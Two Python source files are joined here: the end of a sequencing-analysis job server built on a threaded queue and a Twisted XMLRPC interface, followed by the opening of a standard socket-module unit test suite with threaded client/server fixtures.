of analyses (literally ``Analysis`` objects) waiting to be run. It
operates a thread that sequentially pops analyses from the queue and
runs them each in a separate thread.
The process of running each analysis consists of three parts. It is
implemented in the ``run_analysis`` method.
#. First, the ``AnalysisQueue`` acquires a lock, and calls the
``Analysis`` object's ``initiate()`` method.
#. If the call to ``initiate()`` returns a valid proxy object,
the ``AnalysisQueue`` releases the lock and calls the proxy's
``wait()`` method.
#. Once the proxy's ``wait()`` returns, the ``AnalysisQueue`` again
acquires a lock and calls
the analysis object's ``conclude()`` method to clean up.
The reason for acquiring a lock is to allow the ``AnalysisQueue`` to keep
track of which analyses are running, and to make it easier to implement
queuing in the future. For example, it would be straightforward to
have the ``AnalysisQueue``'s main thread wait until there are less than
N analyses running before initiating another.
"""
def __init__(self, rootdir):
if rootdir.startswith("../"):
rootdir = path.join(os.getcwd(), rootdir)
self.cv = threading.Condition()
self.exit_event = threading.Event()
self.q = []
self.monitors = []
self.running = {}
self.rootdir = rootdir
self.start_time = None
def is_running(self, pk):
"""Determine if an analysis identified by ``pk`` is in progress."""
return pk in self.running
def run_analysis(self, a):
"""Spawn a thread which attempts to start an analysis."""
def go():
# acquire a lock while initiating
self.cv.acquire()
try:
waiter = a.initiate(self.rootdir)
finally:
self.cv.release()
if waiter is not None:
# analysis was successfully initiated
logger.info("%s successfully started" % str(a.name))
assert a.pk not in self.running
self.running[a.pk] = a
# wait for analysis to conclude
comm_result = waiter.communicate()
# acquire lock before terminating
self.cv.acquire()
try:
a.conclude(comm_result)
finally:
if a.pk in self.running:
del self.running[a.pk]
self.cv.release()
logger.info("%s completed" % str(a.name))
else:
# bail, initiation failed
logger.error("%s failed to start" % str(a.name))
return
tr = threading.Thread(target=go)
tr.setDaemon(True)
self.monitors.append(tr)
tr.start()
return tr
def loop(self):
"""Remove un-initiated analyses from the analysis queue, and
run them."""
self.start_time = datetime.datetime.now()
def _loop():
while not self.exit_event.isSet():
self.cv.acquire()
while len(self.q) == 0:
self.cv.wait()
if self.exit_event.is_set():
logger.info("Main loop exiting")
return # leave loop if we're done
a = self.q.pop(0)
self.cv.release()
self.run_analysis(a)
tr = threading.Thread(target=_loop)
tr.setDaemon(True)
tr.start()
return tr
def add_analysis(self, a):
"""Add an analysis to the queue."""
self.cv.acquire()
self.q.append(a)
self.cv.notify()
self.cv.release()
logger.info("Added analysis %s" % a.name)
def stop(self):
"""Terminate the main loop."""
self.exit_event.set()
self.cv.notify()
def status(self, save_path, pk):
"""Determine the status of an analysis identified by 'pk' running
at 'save_path'."""
self.cv.acquire()
try:
if pk in self.running:
ret = (True, self.running[pk].status_string())
else:
fname = path.join(save_path, "status.txt")
if not path.exists(fname):
ret = (False, "Unknown")
else:
infile = open(fname)
retcode = int(infile.read())
infile.close()
if retcode == 0:
ret = (True, "Completed Successfully")
else:
ret = (False, "Failed")
finally:
self.cv.release()
return ret
def all_jobs(self):
"""Return a list of (pk,proxy) for all currently running jobs."""
return list(self.running.items())
def n_jobs(self):
"""Return the number of jobs currently running."""
return len(self.running)
def uptime(self):
"""Return the amount of time the ``AnalysisQueue`` has been running."""
if self.start_time is None:
return 0
else:
diff = datetime.datetime.now() - self.start_time
seconds = float(diff.days * 24 * 3600)
seconds += diff.seconds
seconds += float(diff.microseconds) / 1000000.0
return seconds
def control_job(self, pk, signal):
logger.debug("Analysis queue control_job: %s %s" % (pk, signal))
"""Terminate, suspend, or resume a job."""
self.cv.acquire()
try:
if not self.is_running(pk):
ret = (False, "not running")
else:
a = self.running[pk]
fn = {"term": a.terminate, "stop": a.suspend, "cont": a.resume}.get(
signal.lower()
)
if fn is None:
ret = (False, "invalid signal")
else:
ret = (fn(), "executed")
finally:
self.cv.release()
return ret
def best_analysis_class(self):
if have_drmaa(""):
return DRMAnalysis
else:
return LocalAnalysis
class AnalysisServer(xmlrpc.XMLRPC):
"""Remote procedure call server that links the database with the
analysis queue.
Built on top of Twisted's XMLRPC server.
"""
def __init__(self, analysis_queue):
xmlrpc.XMLRPC.__init__(self)
self.q = analysis_queue
def xmlrpc_updatestatus(self, primarykeyPath, status, reportLink):
from ion.reports import uploadMetrics
try:
uploadMetrics.updateStatus(primarykeyPath, status, reportLink)
except Exception:
logger.error("Update status failed")
return traceback.format_exc()
return 0
def xmlrpc_uploadmetrics(
self,
tfmapperstats_outputfile,
procPath,
beadPath,
ionstats_alignment_json_path,
ionParamsPath,
peakOut,
ionstats_basecaller_json_path,
BaseCallerJsonPath,
primarykeyPath,
uploadStatusPath,
STATUS,
reportLink,
cwd,
):
"""Upload Metrics to the database"""
from ion.reports import uploadMetrics
try:
return_message = uploadMetrics.writeDbFromFiles(
tfmapperstats_outputfile,
procPath,
beadPath,
ionstats_alignment_json_path,
ionParamsPath,
STATUS,
peakOut,
ionstats_basecaller_json_path,
BaseCallerJsonPath,
primarykeyPath,
uploadStatusPath,
cwd,
)
# this will replace the five progress squares with a re-analysis button
uploadMetrics.updateStatus(primarykeyPath, STATUS, reportLink)
except Exception as err:
logger.error("Upload Analysis Metrics failed: %s", err)
return traceback.format_exc()
return return_message
def xmlrpc_uploadanalysismetrics(self, beadPath, primarykeyPath):
logger.info("Updating bead find metrics for %s" % primarykeyPath)
from ion.reports import uploadMetrics
try:
message = uploadMetrics.updateAnalysisMetrics(beadPath, primarykeyPath)
logger.info("Completed Upload Analysis Metrics")
except Exception as err:
logger.error("Upload Analysis Metrics failed: %s", err)
return message
def xmlrpc_submitjob(
self,
jt_nativeSpecification,
jt_remoteCommand,
jt_workingDirectory,
jt_outputPath,
jt_errorPath,
jt_args,
jt_joinFiles,
):
jt = _session.createJobTemplate()
jt.nativeSpecification = jt_nativeSpecification
jt.remoteCommand = jt_remoteCommand
jt.workingDirectory = jt_workingDirectory
jt.outputPath = jt_outputPath
jt.errorPath = jt_errorPath
jt.args = jt_args
jt.joinFiles = jt_joinFiles
jobid = _session.runJob(jt)
_session.deleteJobTemplate(jt)
return jobid
def xmlrpc_jobstatus(self, jobid):
"""Get the status of the job"""
try:
logger.debug("xmlrpc jobstatus for %s" % jobid)
status = _session.jobStatus(jobid)
except Exception:
logger.error("Job Status failure for %s" % jobid)
status = "DRMAA BUG"
return status
def xmlrpc_startanalysis(
self, name, script, parameters, files, savePath, pk, chipType, chips, job_type
):
"""Add an analysis to the ``AnalysisQueue``'s queue of waiting
analyses."""
logger.debug("Analysis request received: %s" % name)
ACls = self.q.best_analysis_class()
la = ACls(
name, script, parameters, files, savePath, pk, chipType, chips, job_type
)
self.q.add_analysis(la)
return name
def xmlrpc_status(self, save_path, pk):
"""Get the status of the job specified by ``pk`` from the
``AnalysisQueue``."""
return self.q.status(save_path, pk)
def xmlrpc_n_running(self):
"""Return the number of jobs the ``AnalysisQueue`` is currently
running."""
return self.q.n_jobs()
def xmlrpc_uptime(self):
"""Return the ``AnalysisQueue``'s uptime."""
logger.debug("uptime checked")
return self.q.uptime()
def xmlrpc_running(self):
"""Return status information about all jobs currently running."""
items = self.q.all_jobs()
ret = []
for pk, a in items:
ret.append((a.name, a.get_id(), a.pk, a.ANALYSIS_TYPE, a.status_string()))
logger.debug(
"Name:%s JobId:%s PK:%s State:'%s'"
% (a.name, a.get_id(), a.pk, a.status_string())
)
return ret
def xmlrpc_control_job(self, pk, signal):
"""Send the given signal to the job specified by ``pk``."""
logger.debug("xmlrpc_control_job: %s %s" % (pk, signal))
return self.q.control_job(pk, signal)
def xmlrpc_test_path(self, path):
"""Determine if ``path`` is readable and writeable by the job
server."""
return os.access(path, os.R_OK | os.W_OK)
def xmlrpc_createRSMExperimentMetrics(self, resultId):
try:
from iondb.rundb.report import tasks as rsmtasks
rsmtasks.createRSMExperimentMetrics(resultId)
return True, "RSM createExperimentMetrics"
except Exception:
logger.error(traceback.format_exc())
return False, traceback.format_exc()
def xmlrpc_resultdiskspace(self, pk):
"""Launches celery task which determines disk space usage and records it
in the Results object for the given primary key reference"""
# Update the Data Management DMFileStat objects related to this Result object
try:
from iondb.rundb.data.tasks import update_dmfilestat_diskusage
update_dmfilestat_diskusage.delay(pk)
except Exception:
logger.warn("update_diskusage celery task failed to launch")
# Generate serialized json file for future Data Management Import
try:
from iondb.rundb.data.tasks import save_serialized_json
save_serialized_json.delay(pk)
except Exception:
logger.warn("save_serialized_json celery task failed")
return 0
if __name__ == "__main__":
try:
logger.info("ionJobServer Started Ver: %s" % __version__)
aq = AnalysisQueue(settings.ANALYSIS_ROOT)
aq.loop()
r = AnalysisServer(aq)
reactor.listenTCP(settings.JOBSERVER_PORT, server.Site(r))
reactor.run()
except Exception as err:
logger.exception("Job Server run-time failure.")
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import platform
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceeded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't masks failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
